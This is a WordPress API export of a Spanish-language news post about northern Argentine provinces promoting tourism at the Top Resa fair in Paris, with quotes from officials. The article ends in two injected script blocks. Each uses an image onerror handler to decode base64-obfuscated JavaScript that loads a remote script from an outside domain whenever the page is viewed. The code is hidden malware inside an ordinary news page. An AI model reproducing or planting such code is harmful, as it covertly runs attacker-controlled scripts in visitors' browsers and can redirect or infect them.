{"id":1536,"date":"2022-09-23T17:58:23","date_gmt":"2022-09-23T20:58:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1536"},"modified":"2025-08-14T00:34:40","modified_gmt":"2025-08-14T03:34:40","slug":"importante-apuesta-del-norte-argentino-por-el-mercado-frances","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1536","title":{"rendered":"Importante apuesta del norte argentino por el mercado Frances"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7e5e05\"><em>Las provincias de la regi\u00f3n norte\u00f1a participan en la feria Top Resa que se desarrolla en Par\u00eds para consolidar el posicionamiento de los destinos en el mercado de Francia.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<strong>Norte argentino<\/strong>&nbsp;contin\u00faa posicion\u00e1ndose en&nbsp;<strong>Francia<\/strong>, con una exitosa participaci\u00f3n en la feria de turismo m\u00e1s importante del mercado.&nbsp;<strong>IFTM Top Resa<\/strong>, que se desarrolla del 20 al 22 en Par\u00eds, fue un nuevo encuentro elegido por parte de las provincias de la regi\u00f3n para mostrar sus atractivos y generar negocios con operadores locales para aumentar el turismo proveniente de Francia.<\/p>\n\n\n\n<p><strong>Sebasti\u00e1n Giobellina<\/strong>, titular del&nbsp;<strong>Ente Aut\u00e1rquico Tucum\u00e1n Turismo y presidente del Consejo Federal de Turismo<\/strong>, fue uno de los representantes de la delegaci\u00f3n y expres\u00f3: \u201c<em>Esta es una de las ferias que m\u00e1s impacta en el norte argentino. Por eso somos varios los ministros que venimos a participar y en representaci\u00f3n al resto. Vemos un inter\u00e9s muy grande en el mercado. Hemos hecho un convenio junto con la C\u00e1mara Argentina de Turismo con los tour operadores argentinos para poder potencializar su participaci\u00f3n y esto nos abre mayores posibilidades de venta de paquetes del norte. Estamos muy contentos con esta feria y agradecidos con el<strong>&nbsp;INPROTUR y con el Ministerio de Turismo de la Naci\u00f3n&nbsp;<\/strong>por el esfuerzo que hacen por estar presentes en esta clase de eventos<\/em>\u201d.<\/p>\n\n\n\n<p>El&nbsp;<strong>Secretario Ejecutivo del INPROTUR, Ricardo Sosa,<\/strong>&nbsp;a\u00f1adi\u00f3: \u201c<em>Los turistas franceses buscan paquetes y viajes en el Norte y creemos valiosa la participaci\u00f3n de la regi\u00f3n en Top Resa. Buscamos la recuperaci\u00f3n del turismo receptivo internacional para el a\u00f1o que viene y superar los niveles de la prepandemia para fines de 2023. Es fundamental el trabajo en conjunto entre sector p\u00fablico y privado, entre los destinos y las empresas privadas que venden paquete<\/em>s\u201d<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Federico Posadas, Ministro de Turismo de Jujuy,<\/strong>&nbsp;cont\u00f3 que&nbsp;<em>\u201ces una feria muy importante para Jujuy, el mercado franc\u00e9s es estrat\u00e9gico. Volvimos a Top Resa tras un parate de dos a\u00f1os por la pandemia y nos pudimos reencontrar con los operadores y agencias de viaje franceses. El convenio con los operadores es fundamental, ya que nosotros cubrimos los gastos de aquellos que incluyen los circuitos tur\u00edsticos de las seis provincias del Norte. Esto es fundamental para traccionar el destino y dar m\u00e1s posibilidades al turista franc\u00e9s de visitar nuestra regi\u00f3n<\/em>\u201d.<\/p>\n\n\n\n<p><strong>Manuela Arancibia, presidente de INPROTUR Salta,<\/strong>&nbsp;explic\u00f3: \u201c<em>Es clave que Salta siga participando en Top Resa todos los a\u00f1os, ya que, del total de turistas extranjeros que recibe la provincia, el 12,6% corresponde al mercado franc\u00e9s, por lo que es considerado por nosotros como un mercado prioritario. Adem\u00e1s, hist\u00f3ricamente Francia es uno de los mayores emisores de turistas del mundo<\/em>\u201d,<\/p>\n\n\n\n<p><strong>Giobellina<\/strong>&nbsp;agreg\u00f3: \u201c<em>Hoy Tucum\u00e1n est\u00e1 mucho m\u00e1s conectada, con vuelos a Cataratas del Iguaz\u00fa, C\u00f3rdoba, Bariloche, Salta, con la costa Argentina, m\u00e1s de 35 vuelos con la ciudad de Buenos Aires y vuelos internacionales desde San Pablo. Estos circuitos integrados, gracias a las conexiones a\u00e9reas, venimos a contarles a los operadores franceses, para que puedan sumarles m\u00e1s experiencias a sus clientes<\/em>.\u201d Adem\u00e1s, particip\u00f3 el&nbsp;<strong>Ministro de Turismo y Cultura de La Rioja, Gustavo Luna<\/strong>.<\/p>\n\n\n\n<p>A su vez, el inter\u00e9s queda demostrado en la participaci\u00f3n de los privados de la regi\u00f3n, como&nbsp;<strong>Tastil Viajes y Turismo<\/strong>, que&nbsp;por primera vez estuvo presente: \u201c<em>Es excelente esta primera experiencia que estamos teniendo y agradecemos al Ente Norte que colabor\u00f3 mucho para que estemos ac\u00e1<\/em>\u201d, expres\u00f3&nbsp;<strong>Agustina Gils<\/strong>, representante de la compa\u00f1\u00eda. Otras operadoras de turismo de Argentina&nbsp;convocadas por la C\u00e1mara Argentina de Turismo notaron un importante inter\u00e9s por parte de los empresarios franceses en comercializar los destinos de la regi\u00f3n m\u00e1s septentrional del pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/argentina.us10.list-manage.com\/track\/click?u=c72ee12e8482a64a249259cc5&amp;id=aaa130aec5&amp;e=1f1bd49e71\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/VisitArgentina_Isologotipo_B_Color_Azul-1-e1628519504367-1024x243.png\" alt=\"\" class=\"wp-image-1537\" width=\"434\" height=\"103\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las provincias de la regi\u00f3n norte\u00f1a participan en la feria Top Resa que se desarrolla en Par\u00eds para consolidar el posicionamiento de los destinos en el mercado de Francia. El&nbsp;Norte argentino&nbsp;contin\u00faa posicion\u00e1ndose en&nbsp;Francia, con una exitosa participaci\u00f3n en la feria de turismo m\u00e1s importante del mercado.&nbsp;IFTM Top Resa, que se desarrolla del 20 al 22 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1538,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1536","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1536"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1536"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1536\/revisions"}],"predecessor-version":[{"id":7339,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1536\/revisions\/7339"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1538"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}